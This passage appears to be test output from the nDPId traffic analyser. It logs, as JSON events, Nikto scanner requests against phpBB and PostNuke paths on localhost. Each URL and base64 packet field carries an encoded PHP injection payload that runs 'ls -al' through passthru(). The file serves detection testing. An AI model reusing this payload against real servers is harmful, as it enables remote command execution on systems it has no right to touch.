01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00904{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277828,"pkt":"AAAAAAAAAAAAAAAACABFAAFwciZAAEAGyV9\/AAABfwAAAccYH5BC50sWR3m1Q4AYAED\/ZAAAAQEICp1m\/2ydZv9sR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277829,"pkt":"AAAAAAAAAAAAAAAACABFAAF14pZAAEAGWOp\/AAABfwAAAccaH5CUOtum6t33\/4AYAED\/aQAAAQEICp1m\/22dZv9tR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01237{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277831,"pkt":"AAAAAAAAAAAAAAAACABFAAFvhNlAAEAGtq1\/AAABfwAAAcccH5Ac\/r3nTujavoAYAED\/YwAAAQEICp1m\/2+dZv9vR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":705,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277831,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277832,"pkt":"AAAAAAAAAAAAAAAACABFAAFtWm5AAEAG4Rp\/AAABfwAAAcceH5BY22NfXgseaYAYAED\/YQAAAQEICp1m\/3CdZv9wR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":706,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277834,"pkt":"AAAAAAAAAAAAAAAACABFAAFtY1BAAEAG2Dh\/AAABfwAAAccgH5CMmFp9naENboAYAED\/YQAAAQEICp1m\/3KdZv9yR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQoNCg=="}
01228{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277836,"pkt":"AAAAAAAAAAAAAAAACABFAAFPP1dAAEAG\/E9\/AAABfwAAAcciH5AaoQZne4dTBYAYAED\/QwAAAQEICp1m\/3OdZv9zR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277836,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1576420277838,"pkt":"AAAAAAAAAAAAAAAACABFAAFY3j1AAEAGXWB\/AAABfwAAAcckH5DNwecJcN6f0YAYAED\/TAAAAQEICp1m\/3adZv92R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7580000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420277838,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277840,"pkt":"AAAAAAAAAAAAAAAACABFAAFdmNpAAEAGor5\/AAABfwAAAccmH5CDpKHt6Uk16IAYAED\/UQAAAQEICp1m\/3idZv93R0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7580000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
